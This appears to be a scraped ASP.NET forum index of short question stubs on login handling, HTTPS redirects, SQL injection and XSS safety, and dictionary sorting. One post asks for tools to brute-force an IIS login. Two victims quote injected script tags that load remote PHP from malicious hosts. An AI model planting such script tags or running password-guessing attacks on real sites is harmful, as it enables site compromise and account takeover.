Security - Good Software To Dictionary Or Brute Force Attack IIS?
Jun 8, 2010
I am looking for something that takes an IIS/ASP.NET website that uses forms authentication and repeatedly tries to log in, either with all possible passwords or with passwords from a dictionary.
I can probably write something up, but I wondered if there was anything publicly available that would be better implemented.
View 3 Replies
Similar Messages:
Jun 21, 2010
Can asp.net Dropdownlist and validating they safely protect against SQL injection attack ??
View 7 Replies
Oct 15, 2010
a major problem from Cross-Site ScriptingAttack, Below is sample script which automatically gets inserted into my HTML and ASPX Pages.
"<script src=http://avidmarketing.ie/images/rc3/companybuttonwhite.php ></script>"
View 5 Replies
Dec 23, 2010
I have a class that maintains a static dictionary of cached lookup results from my domain controller - users' given names and e-mails.My code looks something like:
private static Dictionary<string, string> emailCache = new Dictionary<string, string>();
protected string GetUserEmail(string accountName)
{
if (emailCache.ContainsKey(accountName))
{
return(emailCache[accountName]);
}
lock(/* something */)
{
if (emailCache.ContainsKey(accountName))
[code]...
View 6 Replies
Feb 7, 2010
I'm just wondering if the built in Hashing in the ASP.Net membership good password security, or if there is more that I should do to protect my passwords? If so, what should I look into for a higher level of security?
View 2 Replies
Aug 6, 2010
I am looking for a good video that shows in detail how to implement Impersonation.
Does anyone have websites that i can go look at?
View 1 Replies
May 20, 2010
I have created a test user/password on my web site. The intent is to have prospective clients login and try out the tool. Instead of telling them the userid/password of the test user, I'd like to tweak the Login wizard.
In the Load event, I was able to specify login1.UserName = "test user"
But when I try to specify the password, I'm told it is a readonly field. How can I 'force' a specific password? Or, how can I call the login event directly and pass the needed values?
View 2 Replies
Jan 17, 2010
Does ASP.NET have the capacity to force a user to a login page if they open a new tab or window to the site? So I've got a window open to A Site, I open a new tab to A Site, or a new window to A Site, is it possible to automagically detect that and force a fresh login?
I have a client who is trying to press this requirement on me, and insists that they do it in-house using Session.IsNew. That of course only works when the session has timed out. Is it possible to force a fresh login within an existing session when a new window or tab opens, or no?
View 4 Replies
May 10, 2010
Okay, so I have a site which I'd like to use my SSL certificate for always. So I want all users to be forced to the https version of any url they are directed to.I used this code in my global.asax file:
[Code]....
I've also tried it in the 'Application_BeginRequest' function also. Basically, I have two directories that are secured via Windows Authentication against my domain. if you browsed to the directory (ex. http://www.domain.com/secure) it tries first to authenticate
then redirect to https://www.domain.com/secure. In this case it will ask for credentials twice one right after the other. Is their a way I can have the user redirected before Windows Authentication kicks in?
View 5 Replies
May 28, 2010
How can I force page to use secure connection "https". Client might call the page using insecure connection. I want the page to to check connection, if insecure connection "http" is being used, reload the page with secure "https" connection
View 8 Replies
Sep 23, 2010
My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.
View 6 Replies
Nov 15, 2010
How can I force a user to logout when he press the browser back button ?
View 11 Replies
Aug 23, 2010
Using C# and sqlmembershipprovider forms authentication, is there a way to force user password to expire and need to be reset after x number of days?
So if a user launches the website login.aspx page, when they type their userid, it will check if the password is expired and direct them to a Resetpassword.aspx page?
View 5 Replies
Nov 1, 2010
I'm using a literal to display some javascript on a product page control. Basically what I'm doing is in my code behind I'm declaring a new stringbuilder, writing the script while inserting some dynamic variables to populate the script then setting the literal text to the stringbuilder. This leaves me open to xss attacks. What can I do to prevent this?
System.Text.StringBuilder sb = new System.Text.StringBuilder();
//loop through items in the collection
for (int i = 0; i < _prod.ActiveProductItemCollection.Count; i++)
{
sb.Append("<script type='text/javascript'>");
//add +1 to each item
sb.AppendFormat("mboxCreate("product_productpage_rec{0}",", i+1);
[code]...
View 4 Replies
Nov 26, 2010
I have a textBox and a property to get and set its value:
public SomeText
{
get { return HttpUtility.HtmlEncode(textBox.Text); }
set { textBox.Text = HttpUtility.HtmlEncode(value); }
}
I have used HtmlEncode to prevent Javascript injection attacks. After thinking about it though I'm thinking I only need the HtmlEncode on the getter. The setter is only used by the system and can not be accessed by an external user.
View 2 Replies
Mar 5, 2010
I want to create a Dictionary... where i can get Dictionary database or World lists (english to english , english to hindi)
View 1 Replies
Jul 1, 2010
Is the DetailsView control generally safe from SQL injection attacks if the EDIT mode is displayed?
View 3 Replies
May 31, 2010
I am trying to force to show to the Logon popup when the session is timeout in Integrated Windows Authentication Enabled website. The session_timeout is firing during the session timeout, but the User.Identity.IsAuthenticated is true. How force to use the Windows Logon Screen when the session is timeout.
View 4 Replies
Apr 19, 2010
I have a dictionary in the form of: { "honda" : 4, "toyota": 7, "ford" : 3, "chevy": 10 }
I want to sort it by the second column aka (the value) descending.
Desired output:
"chevy", 10
"toyota", 7
"honda", 4
"ford", 3
View 3 Replies
Mar 19, 2011
I just want to have good idea about Versioning problem! and how .net recovered from that? Can i have some depth info in the same!?
View 1 Replies
Oct 29, 2010
Which detect location most accurate.
View 4 Replies
Jan 18, 2011
I was just wondering if I could do anything more or less w/ IDictionary and how these two collections differ.
View 5 Replies
Jan 17, 2011
class A {
string name;
string code;
}
A1: name="blabla", code="kuku"
A2: name="blabla", code=null
A3: name=null, code="kuku"
Dictionary<A, string> d=new Dictionary<A, string>();
d[A1]="aaa";
d[A2]="bbb"
results: d[A1]="bbb";
[code]...
Is there a way to implement class A as a Key to dictionary?
View 3 Replies
Jul 14, 2010
How do you sort a dictionary object in C# 2.0 for asp.net or is their an alternative to Dictionay for sorting this is to sort a countries list alphabetically
View 3 Replies
May 6, 2010
I end up with a row for each object in the list, and any cell in a given row is bound to a property of the corresponding object.
However, suppose one of the properties of my object is a dictionary, and each is expected to contain a specific key. Is there any way to bind one of my DataGridColumns to that dictionary key?
View 3 Replies